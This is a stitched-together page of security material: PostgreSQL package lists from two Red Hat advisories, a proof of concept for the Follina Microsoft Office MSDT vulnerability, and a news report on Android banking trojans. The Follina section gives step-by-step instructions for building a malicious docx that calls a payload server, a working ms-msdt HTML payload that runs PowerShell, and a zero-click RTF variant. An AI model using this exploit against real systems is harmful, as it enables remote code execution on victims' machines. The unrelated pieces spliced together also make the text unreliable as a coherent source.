postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpYjrdzjgjWX9erEAQgYwQ//VF2YxRRrPW2eo/vHN8Ufp+2QiN61A6+I  
K9wYDdBv+K2alBCSRDU6q9XYbD+jY5tCKDPsnMg+Lkt5bopLEHL2YcUSG4n7uUIq  
Xx5sZJNOO+iJgOIEyrAfrt0YVmsmK9JNqGetSjMzG7T/Dveg50k06+citduD5RoX  
MpiDiKDRm127LMutoWWSb/eKTbfskQ0MwbOgtCK9AMVru+qlW6MlcotEV/lnWJwh  
tQcdUaKeqM6FMTi9Xlh1j83uK6tZRN937SPSwvgG7eaZqyN0pr7Tvp04oujl7+6a  
58dvOfZgbc0mIge3qoSkOclDQmHUY5yTcTUfiN88PMX+S1RnT5m+F5bkksOGgmIc  
xnydxHarDwcEVo3TsA3f2jKjdoeEds7hFuVhABJQcXusqbe4hNUFb5Q3xQtdzV3s  
9LEURVeeG/PrpiNzRgmwbqAh8wD/x/LNSHkY488J1mbjJASA+ALY66XSxhiHLXsn  
n3A+o5ttNDRoi88Nzq3tzz9mzXUjpuBzgklQcgs8j7fhYicx50hjirpUiKKsoP/h  
A7weNbq5ZjEov4p1ecVYfFlOQ0tBFD4wNwtFDHPGd98OxjsA5tN20FwPfr9kLYkT  
LkNGlJa9BPdQOhNlSzRzXT11xjRAFfkuM604EtY3MsYPvyvI9h2HUgG/IDR35p+W  
uM9mNBDQM0A=lLhQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4807-01

Proof of concept for the remote code execution vulnerability in MSDT known as Follina.

# POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina 

> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/)

## Summary 

On the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research  
Team, discovered a malicious Office document shared on Virustotal. This document is  
using an unusual, but known scheme to infect its victims. The scheme was not detected as  
malicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to  
code execution without the need of user interaction, as it does not involve macros, except if the  
Protected View mode is enabled. There is no CVE number attributed yet.

## Technical Details

The vulnerability is being exploited by using the MSProtocol URI scheme to load some code.  
Attackers could embed malicious links inside Microsoft Office documents, templates or emails  
beginning with ms-msdt: that will be loaded and executed afterward without user interaction  
- except if the Protected View mode is enabled. Nevertheless, converting the document to  
the RTF format could also bypass the Protected View feature.

## Proof of Concept 

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute

```  
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"  
```

and `Target="embeddings/oleObject1.bin"` by changing the `Target` value and adding attribute `TargetMode`:

```  
Target = "http://<payload_server>/payload.html!"  
TargetMode = "External"  
```

Note the Id value (probably it is "rId5").

3. Edit `word/document.xml`. Search for the "<o:OLEObject ..>" tag (with `r:id="rId5"`) and change the attribute from `Type="Embed"` to `Type="Link"` and add the attribute `UpdateMode="OnCall"`.

NOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444).

4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`:

```  
<!doctype html>  
<html lang="en">  
<body>  
<script>  
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times  
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";  
</script>

</body>  
</html>  
```

Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).

## BONUS (0-click RTF version)

If you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3:

```  
<o:LinkType>EnhancedMetaFile</o:LinkType>  
<o:LockedField>false</o:LockedField>  
<o:FieldCodes>\f 0</o:FieldCodes>  
```

then it'll work as RTF also (open the resulting docx and save it as RTF).

With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks.

## Sources :

- https://nao-sec.org/about  
- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection  
- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040  
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Microsoft Office MSDT Follina Proof Of Concept

Red Hat Security Advisory 2022-4805-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: postgresql:10 security update  
Advisory ID:       RHSA-2022:4805-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4805  
Issue date:        2022-05-30  
CVE Names:         CVE-2022-1552   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (10.21).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.src.rpm

aarch64:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm

ppc64le:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm

s390x:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm

x86_64:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpTSG9zjgjWX9erEAQh5rQ//fajwjW7BF4vU5SLXYP1LCrXvAs4jldYq  
PUdKxn8jfJy7yy2ZjSeuR9exa0dheBsPkHPB54oVCe/eKrv5tF0rYGkGPWmI3s0K  
uMXfJqkFJRkwDSR0WDhzB8uINPZKZ3YCrPgvH3ZfkX987nIHW6OboaBurO9gjrw+  
aJmo64eYIlxhqkocw8MlQYVyuaYmzCvbReulWKOO7ecYOMy0D2miPq06lbbn99K9  
fGN3yCDYsZIobnyr8mL2JW6WBUEAIF38xFf950ofbYzJwJhNwzQYJ+8iH4DphDub  
4IcnMN+JSn919mgf5OdAHxEo1nT1D1dl2ziWpJssnQQf96W5GIGEHXWexZKI2mv5  
rFdb7kfEDPNYxRo/3QRmF6rowaXC2ZuWFmc2nnCzvOlqUv2gKkXHkk7Q4fvqzRYJ  
0lxh5ONbOxw/JehQ061VItwOlq8CeObmbX1e+DvT/oAIqECr4NN+iDpKIbr65h+y  
WrCSQ1wtlWegIk8Iryx7I8UgLBQHcYKj4ZZjGenT1ksb3TUU3er3AoPpKkGcl+Eu  
3m9/4RhR9EMRKX8glHLNi3aukrmUsZxn3dzAQDvd2xqQ9k2948P2diolFCdKbIA3  
lBF/6sVXmBzIMJzsxNmrXjR5tvjaDZgRoDB/g7K+TIoHcVSt3ozDs8zCxmN/c/K5  
QkUJp119LnM=  
=P2WI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4805-01

An analysis of the mobile threat landscape in 2022 shows that Spain and Turkey are the most targeted countries for malware campaigns, even as a mix of new and existing banking trojans are increasingly targeting Android devices to conduct on-device fraud (ODF).
Other frequently targeted countries include Poland, Australia, the U.S., Germany, the U.K., Italy, France, and Portugal.
"The most

An analysis of the mobile threat landscape in 2022 shows that Spain and Turkey are the most targeted countries for malware campaigns, even as a mix of new and existing banking trojans are increasingly targeting Android devices to conduct on-device fraud (ODF).

Other frequently targeted countries include Poland, Australia, the U.S., Germany, the U.K., Italy, France, and Portugal.

"The most worrying leitmotif is the increasing attention to On-Device Fraud (ODF)," Dutch cybersecurity company ThreatFabric said in a report shared with The Hacker News.

"Just in the first five months of 2022 there has been an increase of more than 40% in malware families that abuse Android OS to perform fraud using the device itself, making it almost impossible to detect them using traditional fraud scoring engines."

Hydra, FluBot (aka Cabassous), Cerberus, Octo, and ERMAC accounted for the most active banking trojans based on the number of samples observed during the same period.

Accompanying this trend is the continued discovery of new dropper apps on Google Play Store that come under the guise of seemingly innocuous productivity and utility applications to distribute the malware -

*   Nano Cleaner (com.casualplay.leadbro)
*   QuickScan (com.zynksoftware.docuscanapp)
*   Chrome (com.talkleadihr)
*   Play Store (com.girltold85)
*   Pocket Screencaster (com.cutthousandjs)
*   Chrome (com.biyitunixiko.populolo)
*   Chrome (Mobile com.xifoforezuma.kebo)
*   BAWAG PSK Security (com.qjlpfydjb.bpycogkzm)

What's more, on-device fraud — which refers to a stealthy method of initiating rogue transactions from victim's devices — has made it feasible to use previously stolen credentials to login to banking applications and carry out financial transactions.

To make matters worse, the banking trojans have also been observed constantly updating their capabilities, with Octo devising an improved method to steal credentials from overlay screens even before they are submitted.

"This is done in order to be able to get the credentials even if \[the\] victim suspected something and closed the overlay without actually pressing the fake 'login' present in the overlay page," the researchers explained.

ERMAC, which emerged last September, has received noticeable upgrades of its own that allow it to siphon seed phrases from different cryptocurrency wallet apps in an automated fashion by taking advantage of Android's Accessibility Service.

Accessibility Service has been Android's Achilles' heel in recent years, allowing threat actors to leverage the legitimate API to serve unsuspecting users with fake overlay screens and capture sensitive information.

Last year, Google attempted to tackle the problem by ensuring that "only services that are designed to help people with disabilities access their device or otherwise overcome challenges stemming from their disabilities are eligible to declare that they are accessibility tools."

But the tech giant is going a step further in Android 13, which is currently in beta, by restricting API access for apps that the user has sideloaded from outside of an app store, effectively making it harder for potentially harmful apps to misuse the service.

That said, ThreatFabric noted it was able to bypass these restrictions trivially by means of a tweaked installation process, suggesting the need for a more stricter approach to counteract such threats.

It's recommended that users stick to downloading apps from the Google Play Store, avoid granting unusual permissions to apps that have no purpose asking for them (e.g., a calculator app asking to access contact lists), and watch out for any phishing attempts aimed at installing rogue apps.

"The openness of Android OS serves both good and bad as malware continues to abuse the legitimate features, whilst upcoming restrictions seem to hardly interfere with the malicious intentions of such apps," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac